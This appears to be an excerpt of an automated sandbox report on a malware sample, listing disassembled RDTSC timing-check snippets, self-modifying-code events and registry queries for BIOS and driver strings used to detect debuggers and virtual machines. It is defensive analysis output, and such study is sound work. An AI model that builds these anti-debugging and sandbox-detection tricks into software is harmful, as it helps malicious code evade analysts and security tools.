                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDCD6 second address: 12BDCDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDCDA second address: 12BDCF4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F39A52A2E5Ch 0x0000000d jng 00007F39A52A2E56h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDCF4 second address: 12BDCFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE1EF second address: 12BE20C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F39A52A2E56h 0x00000009 jno 00007F39A52A2E56h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 jmp 00007F39A52A2E5Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE51E second address: 12BE529 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F39A52A77C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE529 second address: 12BE545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d ja 00007F39A52A2E56h 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE7AD second address: 12BE7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE7B3 second address: 12BE7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C27E9 second address: 12C2809 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F39A52A77D9h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2809 second address: 12C2837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F39A52A2E5Fh 0x0000000b jmp 00007F39A52A2E5Ch 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007F39A52A2E8Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2837 second address: 12C283B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2AFE second address: 12C2B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jno 00007F39A52A2E56h 0x0000000d popad 0x0000000e jns 00007F39A52A2E5Ch 0x00000014 popad 0x00000015 push esi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3144 second address: 12C3158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7EF2 second address: 12C7EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7EF8 second address: 12C7EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7EFC second address: 12C7F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CFB17 second address: 12CFB30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77D5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CFB30 second address: 12CFB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F39A52A2E5Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F39A52A2E63h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CFDBE second address: 12CFE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F39A52A77DFh 0x0000000a pushad 0x0000000b jbe 00007F39A52A77C6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push edi 0x00000016 jmp 00007F39A52A77D4h 0x0000001b push eax 0x0000001c ja 00007F39A52A77C6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CFF62 second address: 12CFF71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F39A52A2E56h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D00D2 second address: 12D00D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D00D6 second address: 12D00E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E5Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D00E8 second address: 12D0113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F39A52A77CCh 0x0000000b jmp 00007F39A52A77D0h 0x00000010 push esi 0x00000011 jg 00007F39A52A77C6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0263 second address: 12D0274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F39A52A2E56h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0274 second address: 12D0284 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F39A52A77CEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D06B6 second address: 12D06C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jo 00007F39A52A2E56h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D06C8 second address: 12D06DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F39A52A77C6h 0x00000008 jns 00007F39A52A77C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D06DB second address: 12D06EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F39A52A2E56h 0x0000000a jnl 00007F39A52A2E56h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D06EC second address: 12D06FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F39A52A77C6h 0x00000009 jg 00007F39A52A77C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0F94 second address: 12D0F9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0F9A second address: 12D0F9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0F9F second address: 12D0FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F39A52A2E66h 0x00000011 jo 00007F39A52A2E56h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0FCE second address: 12D0FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0FD4 second address: 12D0FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0FDD second address: 12D0FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D6E76 second address: 12D6E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a je 00007F39A52A2E56h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D6E87 second address: 12D6E9D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F39A52A77C6h 0x00000009 jnp 00007F39A52A77C6h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D6E9D second address: 12D6EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9A4B second address: 12D9A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9A51 second address: 12D9A57 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9889 second address: 12D988D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D988D second address: 12D98C1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F39A52A2E56h 0x00000008 js 00007F39A52A2E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F39A52A2E62h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F39A52A2E5Ch 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA676 second address: 12EA6A5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F39A52A77D9h 0x00000008 jnp 00007F39A52A77CCh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA6A5 second address: 12EA6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F39A52A2E60h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA6BF second address: 12EA6C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA6C5 second address: 12EA6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F39A52A2E56h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F96D0 second address: 12F96E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F39A52A77C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jc 00007F39A52A77C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13012A3 second address: 13012A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13016B7 second address: 13016CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77D2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301969 second address: 130196D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130196D second address: 1301971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301AD7 second address: 1301AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E61h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F39A52A2E5Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301C79 second address: 1301C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F39A52A77CBh 0x0000000a jmp 00007F39A52A77CEh 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13061D6 second address: 13061E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F39A52A2E56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13061E2 second address: 13061E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305D10 second address: 1305D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305D17 second address: 1305D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305ED5 second address: 1305EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F39A52A2E5Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C472 second address: 130C476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C476 second address: 130C48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F39A52A2E62h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313B2C second address: 1313B3A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F39A52A77C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313B3A second address: 1313B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13110E6 second address: 13110EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B3DD second address: 121B3E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320D09 second address: 1320D4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F39A52A77C6h 0x0000000b jmp 00007F39A52A77CEh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F39A52A77D9h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jg 00007F39A52A77DEh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320D4A second address: 1320D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E62h 0x00000009 jmp 00007F39A52A2E5Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332386 second address: 13323A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jns 00007F39A52A77CCh 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F39A52A77C6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13323A3 second address: 13323A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133266B second address: 1332677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F39A52A77C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332677 second address: 133267B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133267B second address: 1332688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332688 second address: 133268D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133268D second address: 1332692 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332DC6 second address: 1332DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332DCA second address: 1332DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332DD0 second address: 1332DDA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332DDA second address: 1332DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332DE0 second address: 1332DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133309B second address: 133309F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13360FF second address: 1336103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1336103 second address: 1336113 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push ebx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1336113 second address: 1336130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 nop 0x00000007 mov edx, 0A676104h 0x0000000c push 00000004h 0x0000000e mov dword ptr [ebp+122D1922h], ebx 0x00000014 push 6D5136CDh 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1336130 second address: 133613B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133613B second address: 133613F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13392FF second address: 1339307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338EA9 second address: 1338EC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F39A52A2E63h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A02D3 second address: 59A031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F39A52A77CFh 0x00000009 adc al, 0000003Eh 0x0000000c jmp 00007F39A52A77D9h 0x00000011 popfd 0x00000012 mov ch, 71h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F39A52A77CAh 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A031A second address: 59A031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A031E second address: 59A0322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A0322 second address: 59A0328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A0328 second address: 59A032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BF83 second address: 125BF87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125BF87 second address: 125BF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10A1CC9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 124C32F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 109F2F2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1275A8F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01248B89 rdtsc 0_2_01248B89
